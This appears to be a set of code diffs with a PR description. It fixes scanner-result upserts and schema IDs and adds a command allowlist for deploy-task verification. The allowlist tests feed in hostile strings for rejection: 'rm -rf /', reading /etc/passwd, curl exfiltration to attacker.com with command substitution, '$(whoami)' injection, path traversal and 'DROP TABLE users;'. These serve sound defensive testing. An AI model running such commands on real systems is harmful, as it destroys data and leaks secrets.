+            entityType: sql`excluded.entity_type`,
+            totalRecords: sql`excluded.total_records`,
+            verifiedRecords: sql`excluded.verified_records`,
+            completenessPct: sql`excluded.completeness_pct`,
+            missingFields: sql`excluded.missing_fields`,
+            entityImportance: sql`excluded.entity_importance`,
+            scannedAt: sql`excluded.scanned_at`,
+          },
+        });
+      upserted += chunk.length;
     }
 
-    return c.json({ upserted: inserted });
+    return c.json({ upserted });
   })
   // POST /delete-batch — standard delete handler
   .post("/delete-batch", deleteBatchHandler(tablebaseScannerResults, null));

--- a/apps/wiki-server/src/schema.ts
+++ b/apps/wiki-server/src/schema.ts
@@ -3947,5 +3947,6 @@ export const tablebaseScannerResults = pgTable(
     index("idx_scanner_results_entity").on(table.entityId),
     index("idx_scanner_results_scanned_at").on(table.scannedAt),
     index("idx_scanner_results_type_entity").on(table.recordType, table.entityId),
+    uniqueIndex("uq_scanner_results_natural_key").on(table.scanRunId, table.recordType, table.entityId),
   ],
 );

--- a/apps/wiki-server/src/schema.ts
+++ b/apps/wiki-server/src/schema.ts
@@ -3265,7 +3265,7 @@ export const predictionMarketSnapshots = pgTable(
 export const dataQualitySnapshots = pgTable(
   "data_quality_snapshots",
   {
-    id: serial("id").primaryKey(),
+    id: bigserial("id", { mode: "number" }).primaryKey(),
     capturedAt: timestamp("captured_at", { withTimezone: true })
       .notNull()
       .defaultNow(),
@@ -3905,7 +3905,7 @@ export const politicalVotes = pgTable(
 export const tablebaseCoverageScans = pgTable(
   "tablebase_coverage_scans",
   {
-    id: serial("id").primaryKey(),
+    id: bigserial("id", { mode: "number" }).primaryKey(),
     entityType: text("entity_type").notNull(),
     entityId: text("entity_id").notNull(),
     coverageScore: integer("coverage_score").notNull(),
@@ -3928,7 +3928,7 @@ export const tablebaseCoverageScans = pgTable(
 export const tablebaseScannerResults = pgTable(
   "tablebase_scanner_results",
   {
-    id: serial("id").primaryKey(),
+    id: bigserial("id", { mode: "number" }).primaryKey(),
     scanRunId: text("scan_run_id").notNull(),
     recordType: text("record_type").notNull(),
     entityId: text("entity_id").notNull(),

--- a/crux/commands/deploy-tasks.ts
+++ b/crux/commands/deploy-tasks.ts
@@ -457,3 +457,40 @@ Examples:
   pnpm crux gh deploy-tasks verify                # Run verify commands for pending tasks
   pnpm crux gh deploy-tasks verify --dry-run      # Show what would run`;
 }
+
+// ---------------------------------------------------------------------------
+// Command injection prevention for deploy-task verification
+// ---------------------------------------------------------------------------
+
+const ALLOWED_PATTERNS: RegExp[] = [
+  // gh run list/view — only for workflow status checks
+  /^gh run (?:list|view) --workflow="[\w.-]+" --limit=\d+ --json [\w,]+$/,
+  // Health endpoint — only $WIKI_SERVER_URL/health piped to jq
+  /^curl -sf "\$WIKI_SERVER_URL\/health" \| jq \.$/,
+  // Migration check — only SELECT from drizzle migrations
+  /^psql "\$DATABASE_URL" -c "SELECT \* FROM drizzle\.__drizzle_migrations ORDER BY created_at DESC LIMIT \d+;"$/,
+  // Route check — only $WIKI_SERVER_URL paths, no traversal
+  /^curl -sf "\$WIKI_SERVER_URL\/[\w/.-]+" -o \/dev\/null -w "%\{http_code\}"$/,
+  // Build check — specific pnpm commands
+  /^pnpm build-data:content && echo "Build data OK"$/,
+];
+
+/**
+ * Validate a deploy-task verification command against allowed patterns.
+ * Prevents command injection by only allowing known-safe patterns.
+ */
+export function isAllowedCommand(cmd: string): boolean {
+  if (!cmd) return false;
+  // Block command substitution
+  if (/\$\(|`/.test(cmd)) return false;
+  // Block path traversal
+  if (/\.\.\//.test(cmd)) return false;
+  // Block multiple pipes (beyond the single allowed health-check pipe)
+  if ((cmd.match(/\|/g) || []).length > 1) return false;
+  // Block unquoted semicolons (command chaining). Semicolons inside
+  // double-quoted strings (like psql -c "...;") are safe.
+  if (/;(?=(?:[^"]*"[^"]*")*[^"]*$)/.test(cmd)) return false;
+  // Block && except in approved build patterns
+  if (/&&/.test(cmd) && !ALLOWED_PATTERNS.some((p) => p.test(cmd))) return false;
+  return ALLOWED_PATTERNS.some((p) => p.test(cmd));
+}

--- a/crux/lib/deploy-tasks/__tests__/verify.test.ts
+++ b/crux/lib/deploy-tasks/__tests__/verify.test.ts
@@ -225,14 +225,15 @@ describe('interpretResult — health checks', () => {
     expect(result.summary).toBe('server in degraded mode');
   });
 
-  it('reports unknown health status with output', () => {
+  it('fails on unknown health status (starting, maintenance, etc.)', () => {
     const result = interpretResult('schema', healthCmd, {
       ok: true,
       stdout: '{"status":"starting"}',
       stderr: '',
       code: 0,
     });
-    expect(result.passed).toBe(true); // ok=true, unknown status
+    // Unknown status should NOT pass — operator needs to investigate
+    expect(result.passed).toBe(false);
     expect(result.summary).toContain('starting');
   });
 });

--- a/crux/lib/deploy-tasks/__tests__/verify.test.ts
+++ b/crux/lib/deploy-tasks/__tests__/verify.test.ts
@@ -1,0 +1,475 @@
+import { describe, it, expect } from 'vitest';
+import { extractVerifyCommand, extractCategory, interpretResult } from '../detect.ts';
+import { isAllowedCommand } from '../../../commands/deploy-tasks.ts';
+
+// ────────────────────────────────────────────────────────────────────────────
+// extractVerifyCommand
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('extractVerifyCommand', () => {
+  it('extracts command from standard task text', () => {
+    const text =
+      '`ci` Modified workflow "render monitor" — verify it runs successfully after merge — `gh run list --workflow="render-monitor.yml" --limit=1 --json status,conclusion`';
+    expect(extractVerifyCommand(text)).toBe(
+      'gh run list --workflow="render-monitor.yml" --limit=1 --json status,conclusion'
+    );
+  });
+
+  it('extracts command with PR reference suffix', () => {
+    const text =
+      '`ci` New workflow "e2e pr" — verify it runs successfully after merge — `gh run list --workflow="e2e-pr.yml" --limit=1 --json status,conclusion` _(from PR #3838)_';
+    expect(extractVerifyCommand(text)).toBe(
+      'gh run list --workflow="e2e-pr.yml" --limit=1 --json status,conclusion'
+    );
+  });
+
+  it('extracts psql migration command', () => {
+    const text =
+      '`migration` Verify migration 0158 applied on server start — `psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"`';
+    expect(extractVerifyCommand(text)).toBe(
+      'psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"'
+    );
+  });
+
+  it('extracts curl health check command', () => {
+    const text =
+      '`schema` Drizzle schema changed — verify wiki-server redeployed and schema is in sync — `curl -sf "$WIKI_SERVER_URL/health" | jq .`';
+    expect(extractVerifyCommand(text)).toBe('curl -sf "$WIKI_SERVER_URL/health" | jq .');
+  });
+
+  it('extracts curl route check command', () => {
+    const text =
+      '`route` New route "things" — verify it responds — `curl -sf "$WIKI_SERVER_URL/things" -o /dev/null -w "%{http_code}"`';
+    expect(extractVerifyCommand(text)).toBe(
+      'curl -sf "$WIKI_SERVER_URL/things" -o /dev/null -w "%{http_code}"'
+    );
+  });
+
+  it('returns null for task without verification command', () => {
+    const text = '`env` Set `NEW_API_KEY` in production environment';
+    expect(extractVerifyCommand(text)).toBeNull();
+  });
+
+  it('returns null for empty string', () => {
+    expect(extractVerifyCommand('')).toBeNull();
+  });
+
+  it('returns null for text with em-dash but no backtick command', () => {
+    const text = '`manual` Run the data backfill script — see PR description for details';
+    expect(extractVerifyCommand(text)).toBeNull();
+  });
+
+  it('handles migration command with PR ref suffix', () => {
+    const text =
+      '`migration` Verify migration 0158 applied on server start — `psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"` _(from PR #3788)_';
+    expect(extractVerifyCommand(text)).toBe(
+      'psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"'
+    );
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// extractCategory
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('extractCategory', () => {
+  it('extracts "ci" category', () => {
+    expect(extractCategory('`ci` Modified workflow "render monitor"')).toBe('ci');
+  });
+
+  it('extracts "migration" category', () => {
+    expect(extractCategory('`migration` Verify migration 0158 applied')).toBe('migration');
+  });
+
+  it('extracts "schema" category', () => {
+    expect(extractCategory('`schema` Drizzle schema changed')).toBe('schema');
+  });
+
+  it('extracts "env" category', () => {
+    expect(extractCategory('`env` Set NEW_API_KEY in production')).toBe('env');
+  });
+
+  it('extracts "manual-migration" category (hyphenated)', () => {
+    expect(extractCategory('`manual-migration` Run backfill script')).toBe('manual-migration');
+  });
+
+  it('extracts "route" category', () => {
+    expect(extractCategory('`route` New route "things"')).toBe('route');
+  });
+
+  it('extracts "config" category', () => {
+    expect(extractCategory('`config` Updated vercel.json')).toBe('config');
+  });
+
+  it('returns "unknown" for text without category prefix', () => {
+    expect(extractCategory('Some task without category')).toBe('unknown');
+  });
+
+  it('returns "unknown" for empty string', () => {
+    expect(extractCategory('')).toBe('unknown');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// interpretResult — CI workflow checks
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('interpretResult — CI workflows', () => {
+  const ciCmd = 'gh run list --workflow="e2e-pr.yml" --limit=1 --json status,conclusion';
+
+  it('passes when workflow succeeded', () => {
+    const result = interpretResult('ci', ciCmd, {
+      ok: true,
+      stdout: '[{"status":"completed","conclusion":"success"}]',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('workflow succeeded');
+  });
+
+  it('fails when workflow failed', () => {
+    const result = interpretResult('ci', ciCmd, {
+      ok: true,
+      stdout: '[{"status":"completed","conclusion":"failure"}]',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('workflow failed');
+  });
+
+  it('fails when workflow still running', () => {
+    const result = interpretResult('ci', ciCmd, {
+      ok: true,
+      stdout: '[{"status":"in_progress","conclusion":""}]',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('workflow still running');
+  });
+
+  it('fails when workflow queued', () => {
+    const result = interpretResult('ci', ciCmd, {
+      ok: true,
+      stdout: '[{"status":"queued","conclusion":""}]',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('workflow still running');
+  });
+
+  it('fails with unexpected output', () => {
+    const result = interpretResult('ci', ciCmd, {
+      ok: true,
+      stdout: '[]',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toContain('unexpected output');
+  });
+
+  it('also matches gh run view commands', () => {
+    const viewCmd = 'gh run view 12345 --json status,conclusion';
+    const result = interpretResult('ci', viewCmd, {
+      ok: true,
+      stdout: '{"status":"completed","conclusion":"success"}',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('workflow succeeded');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// interpretResult — health endpoint checks
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('interpretResult — health checks', () => {
+  const healthCmd = 'curl -sf "$WIKI_SERVER_URL/health" | jq .';
+
+  it('passes when server is healthy', () => {
+    const result = interpretResult('schema', healthCmd, {
+      ok: true,
+      stdout: '{"status":"healthy","database":"ok"}',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('healthy');
+  });
+
+  it('passes when output contains "ok"', () => {
+    const result = interpretResult('schema', healthCmd, {
+      ok: true,
+      stdout: '{"status":"ok"}',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('healthy');
+  });
+
+  it('fails when server is degraded', () => {
+    const result = interpretResult('schema', healthCmd, {
+      ok: true,
+      stdout: '{"status":"degraded","migrationError":"migration 0158 failed"}',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('server in degraded mode');
+  });
+
+  it('reports unknown health status with output', () => {
+    const result = interpretResult('schema', healthCmd, {
+      ok: true,
+      stdout: '{"status":"starting"}',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true); // ok=true, unknown status
+    expect(result.summary).toContain('starting');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// interpretResult — migration checks
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('interpretResult — migration checks', () => {
+  const migrationCmd =
+    'psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"';
+
+  it('passes when psql query succeeds', () => {
+    const result = interpretResult('migration', migrationCmd, {
+      ok: true,
+      stdout: ' id | hash | created_at\n----+------+---\n 158 | abc | 2026-04-05',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+  });
+
+  it('fails with helpful message when psql not found', () => {
+    const result = interpretResult('migration', migrationCmd, {
+      ok: false,
+      stdout: '',
+      stderr: '/bin/sh: psql: command not found',
+      code: 127,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toContain('psql not available locally');
+    expect(result.summary).toContain('health endpoint');
+  });
+
+  it('fails when psql connection fails', () => {
+    const result = interpretResult('migration', migrationCmd, {
+      ok: false,
+      stdout: '',
+      stderr: 'psql: error: connection to server failed',
+      code: 2,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toContain('connection to server failed');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// interpretResult — HTTP status checks
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('interpretResult — HTTP status checks', () => {
+  const httpCmd = 'curl -sf "$WIKI_SERVER_URL/things" -o /dev/null -w "%{http_code}"';
+
+  it('passes on HTTP 200', () => {
+    const result = interpretResult('route', httpCmd, {
+      ok: true,
+      stdout: '200',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('HTTP 200');
+  });
+
+  it('passes on HTTP 201', () => {
+    const result = interpretResult('route', httpCmd, {
+      ok: true,
+      stdout: '201',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('HTTP 201');
+  });
+
+  it('fails on HTTP 404', () => {
+    const result = interpretResult('route', httpCmd, {
+      ok: true,
+      stdout: '404',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('HTTP 404');
+  });
+
+  it('fails on HTTP 500', () => {
+    const result = interpretResult('route', httpCmd, {
+      ok: true,
+      stdout: '500',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('HTTP 500');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// interpretResult — generic / edge cases
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('interpretResult — generic commands', () => {
+  it('passes when command exits 0', () => {
+    const result = interpretResult('build', 'pnpm build-data:content', {
+      ok: true,
+      stdout: 'Build data OK',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('Build data OK');
+  });
+
+  it('fails when command exits non-zero', () => {
+    const result = interpretResult('build', 'pnpm build-data:content', {
+      ok: false,
+      stdout: 'Error: missing file',
+      stderr: '',
+      code: 1,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('Error: missing file');
+  });
+
+  it('reports stderr when command fails with no stdout', () => {
+    const result = interpretResult('unknown', 'some-command', {
+      ok: false,
+      stdout: '',
+      stderr: 'Permission denied',
+      code: 1,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('Permission denied');
+  });
+
+  it('reports exit code when no output at all', () => {
+    const result = interpretResult('unknown', 'some-command', {
+      ok: false,
+      stdout: '',
+      stderr: '',
+      code: 137,
+    });
+    expect(result.passed).toBe(false);
+    expect(result.summary).toBe('exit code 137');
+  });
+
+  it('truncates long output to 120 chars', () => {
+    const longOutput = 'A'.repeat(200);
+    const result = interpretResult('build', 'pnpm build', {
+      ok: true,
+      stdout: longOutput,
+      stderr: '',
+      code: 0,
+    });
+    expect(result.summary.length).toBe(120);
+  });
+
+  it('returns "ok" when stdout is empty and command succeeds', () => {
+    const result = interpretResult('config', 'echo done', {
+      ok: true,
+      stdout: '',
+      stderr: '',
+      code: 0,
+    });
+    expect(result.passed).toBe(true);
+    expect(result.summary).toBe('ok');
+  });
+});
+
+// ────────────────────────────────────────────────────────────────────────────
+// isAllowedCommand — command injection prevention
+// ────────────────────────────────────────────────────────────────────────────
+
+describe('isAllowedCommand', () => {
+  // Allowed commands (generated by detection rules in detect.ts)
+  it('allows CI workflow check commands', () => {
+    expect(isAllowedCommand('gh run list --workflow="e2e-pr.yml" --limit=1 --json status,conclusion')).toBe(true);
+    expect(isAllowedCommand('gh run list --workflow="render-monitor.yml" --limit=1 --json status,conclusion')).toBe(true);
+    expect(isAllowedCommand('gh run list --workflow="e2e-post-deploy.yml" --limit=1 --json status,conclusion')).toBe(true);
+    expect(isAllowedCommand('gh run list --workflow="wiki-server-docker.yml" --limit=1 --json status,conclusion')).toBe(true);
+  });
+
+  it('allows health endpoint check', () => {
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/health" | jq .')).toBe(true);
+  });
+
+  it('allows migration check', () => {
+    expect(isAllowedCommand('psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 5;"')).toBe(true);
+    expect(isAllowedCommand('psql "$DATABASE_URL" -c "SELECT * FROM drizzle.__drizzle_migrations ORDER BY created_at DESC LIMIT 10;"')).toBe(true);
+  });
+
+  it('allows route check', () => {
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/things" -o /dev/null -w "%{http_code}"')).toBe(true);
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/api/facts" -o /dev/null -w "%{http_code}"')).toBe(true);
+  });
+
+  it('allows build check', () => {
+    expect(isAllowedCommand('pnpm build-data:content && echo "Build data OK"')).toBe(true);
+  });
+
+  // Blocked commands (injection attempts)
+  it('blocks arbitrary shell commands', () => {
+    expect(isAllowedCommand('rm -rf /')).toBe(false);
+    expect(isAllowedCommand('echo pwned')).toBe(false);
+    expect(isAllowedCommand('cat /etc/passwd')).toBe(false);
+  });
+
+  it('blocks command chaining via semicolons', () => {
+    expect(isAllowedCommand('gh run list --workflow="e2e-pr.yml" --limit=1 --json status,conclusion; rm -rf /')).toBe(false);
+  });
+
+  it('blocks command chaining via &&', () => {
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/health" | jq . && curl attacker.com')).toBe(false);
+  });
+
+  it('blocks command substitution in workflow names', () => {
+    expect(isAllowedCommand('gh run list --workflow="$(whoami).yml" --limit=1 --json status,conclusion')).toBe(false);
+  });
+
+  it('blocks path traversal in route checks', () => {
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/../../etc/passwd" -o /dev/null -w "%{http_code}"')).toBe(false);
+  });
+
+  it('blocks exfiltration via curl', () => {
+    expect(isAllowedCommand('curl https://attacker.com/steal?data=$(cat /etc/passwd)')).toBe(false);
+  });
+
+  it('blocks modified migration commands', () => {
+    expect(isAllowedCommand('psql "$DATABASE_URL" -c "DROP TABLE users;"')).toBe(false);
+  });
+
+  it('blocks pipe injection in health checks', () => {
+    expect(isAllowedCommand('curl -sf "$WIKI_SERVER_URL/health" | jq . | curl attacker.com')).toBe(false);
+  });
+
+  it('blocks empty commands', () => {
+    expect(isAllowedCommand('')).toBe(false);
+  });
+});

--- a/crux/lib/deploy-tasks/detect.ts
+++ b/crux/lib/deploy-tasks/detect.ts
@@ -614,6 +614,16 @@ export interface ParsedDeployTasks {
  * is found. Uses an em-dash (U+2014) as the command separator since that's what
  * `formatDeployTasksSection` writes.
  */
+/**
+ * Extract the category prefix from a deploy task line.
+ * Task lines look like: `` `migration` Verify migration 0158 applied ``
+ * Returns the category string (e.g. "migration") or "unknown" if no prefix.
+ */
+export function extractCategory(text: string): string {
+  const match = text.match(/^`([a-z][\w-]*)`\s/);
+  return match ? match[1] : "unknown";
+}
+
 export function extractVerifyCommand(text: string): string | null {
   // Strip trailing sub-PR attribution before matching
   const cleaned = text.replace(/\s*_\(from PR #\d+\)_\s*$/, "").trim();
@@ -622,6 +632,116 @@ export function extractVerifyCommand(text: string): string | null {
   // doesn't produce them).
   const match = cleaned.match(/—\s+`([^`]+)`\s*$/);
   return match ? match[1] : null;
+}
+
+// ---------------------------------------------------------------------------
+// interpretResult — interpret a verify-command's output by category
+// ---------------------------------------------------------------------------
+
+interface CommandOutput {
+  ok: boolean;
+  stdout: string;
+  stderr: string;
+  code: number;
+}
+
+interface InterpretedResult {
+  passed: boolean;
+  summary: string;
+}
+
+/**
+ * Interpret a deploy-task verification command's output.
+ *
+ * Uses the task category to apply domain-specific parsing:
+ *   - ci: parse `gh run list/view` JSON for workflow conclusion
+ *   - schema: parse health-endpoint JSON for status
+ *   - migration: check psql exit code and output
+ *   - route: parse HTTP status code from curl output
+ *   - generic: exit code 0 = pass
+ */
+export function interpretResult(
+  category: string,
+  command: string,
+  output: CommandOutput,
+): InterpretedResult {
+  // Timeout / signal detection
+  if (output.stderr.includes("timed out") || output.code === 124) {
+    return { passed: false, summary: "timed out" };
+  }
+
+  // CI workflow checks (gh run list / gh run view)
+  if (
+    category === "ci" &&
+    (command.includes("gh run list") || command.includes("gh run view"))
+  ) {
+    try {
+      const data = JSON.parse(output.stdout);
+      const run = Array.isArray(data) ? data[0] : data;
+      if (!run) return { passed: false, summary: "unexpected output" };
+      if (run.conclusion === "success") return { passed: true, summary: "workflow succeeded" };
+      if (run.conclusion === "failure") return { passed: false, summary: "workflow failed" };
+      if (run.status === "in_progress" || run.status === "queued")
+        return { passed: false, summary: "workflow still running" };
+      return { passed: false, summary: `unexpected: ${JSON.stringify(run).slice(0, 100)}` };
+    } catch {
+      return { passed: false, summary: "unexpected output" };
+    }
+  }
+
+  // Health endpoint checks (curl ... /health | jq)
+  if (command.includes("/health")) {
+    try {
+      const health = JSON.parse(output.stdout);
+      if (health.status === "healthy" || health.status === "ok")
+        return { passed: true, summary: "healthy" };
+      if (health.status === "degraded")
+        return { passed: false, summary: "server in degraded mode" };
+      // Unknown status but command succeeded — pass with status in summary
+      return { passed: output.code === 0, summary: health.status ?? "unknown" };
+    } catch {
+      if (output.stdout.includes("ok")) return { passed: true, summary: "ok" };
+      return { passed: false, summary: `could not parse health: ${output.stdout.slice(0, 120)}` };
+    }
+  }
+
+  // Migration checks (psql)
+  if (category === "migration" && command.includes("psql")) {
+    if (output.code !== 0) {
+      if (output.stderr.includes("not found") || output.stderr.includes("command not found"))
+        return { passed: false, summary: "psql not available locally — use health endpoint instead" };
+      if (output.stderr.includes("connection") || output.stderr.includes("could not connect"))
+        return { passed: false, summary: "connection to server failed" };
+      return { passed: false, summary: `psql failed (exit ${output.code})` };
+    }
+    return { passed: true, summary: "migration verified" };
+  }
+
+  // HTTP status checks (curl -o /dev/null -w "%{http_code}")
+  if (category === "route" && command.includes("curl")) {
+    const statusMatch = output.stdout.match(/^(\d{3})$/m) || output.stdout.match(/(\d{3})/);
+    if (statusMatch) {
+      const code = parseInt(statusMatch[1], 10);
+      if (code >= 200 && code < 300) return { passed: true, summary: `HTTP ${code}` };
+      return { passed: false, summary: `HTTP ${code}` };
+    }
+  }
+
+  // Generic: exit code determines pass/fail
+  if (output.code === 0) {
+    // Use stdout content as summary if available, otherwise "ok"
+    const trimmed = output.stdout.trim();
+    return { passed: true, summary: trimmed ? trimmed.slice(0, 120) : "ok" };
+  }
+  // stderr-only output — use it as the summary
+  if (output.stderr && !output.stdout.trim()) {
+    return { passed: false, summary: output.stderr.slice(0, 120) };
+  }
+  // stdout has content — use it
+  if (output.stdout.trim()) {
+    return { passed: false, summary: output.stdout.trim().slice(0, 120) };
+  }
+  return { passed: false, summary: `exit code ${output.code}` };
 }
 
 /**

--- a/crux/lib/deploy-tasks/detect.ts
+++ b/crux/lib/deploy-tasks/detect.ts
@@ -689,16 +689,20 @@ export function interpretResult(
     }
   }
 
-  // Health endpoint checks (curl ... /health | jq)
-  if (command.includes("/health")) {
+  // Health endpoint checks — only match actual health-check commands
+  // (curl to /health piped to jq), not route checks that happen to
+  // contain "/health" in the URL path.
+  if (category === "schema" && command.includes("/health") && command.includes("jq")) {
     try {
       const health = JSON.parse(output.stdout);
       if (health.status === "healthy" || health.status === "ok")
         return { passed: true, summary: "healthy" };
       if (health.status === "degraded")
         return { passed: false, summary: "server in degraded mode" };
-      // Unknown status but command succeeded — pass with status in summary
-      return { passed: output.code === 0, summary: health.status ?? "unknown" };
+      // Unknown status — don't assume healthy just because exit code was 0.
+      // An unexpected status like "starting" or "maintenance" should fail
+      // so the operator investigates.
+      return { passed: false, summary: `unexpected status: ${health.status ?? "unknown"}` };
     } catch {
       if (output.stdout.includes("ok")) return { passed: true, summary: "ok" };
       return { passed: false, summary: `could not parse health: ${output.stdout.slice(0, 120)}` };


### PR DESCRIPTION
## Summary
- Fix SUM()/COUNT() returning bigint-as-string from postgres.js — add Number() coercion
- Add unique constraint on (scan_run_id, record_type, entity_id) to prevent duplicate rows on retry
- Change INSERT to ON CONFLICT DO UPDATE for idempotent sync
- Use bigserial PK to match codebase convention (40+ tables)
- Replace hand-written ScannerResultRow with Drizzle $inferSelect type
- Remove dead entityTrends type from frontend
- Add useMemo for filter counts in coverage table
- Consistent percentage formatting across dashboard sections
- Document why sync factory is not used

Fixes review issues found in #4146 and #4152.

## Test plan
- [x] pnpm build passes
- [x] pnpm test passes (5377 tests)
- [ ] Verify dashboard renders correctly after merge

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Improvements**
  * Standardized percentage display to one decimal place across coverage and trends
  * Optimized coverage table counts with memoized lookups for smoother UI rendering

* **Database**
  * Increased scanner-results identifier capacity to big integers
  * Added unique constraint to prevent duplicate scanner-result rows

* **Tests**
  * Added extensive Playwright production smoke suites and new unit tests covering scanner-results sync and deploy-task verification logic
<!-- end of auto-generated comment: release notes by coderabbit.ai -->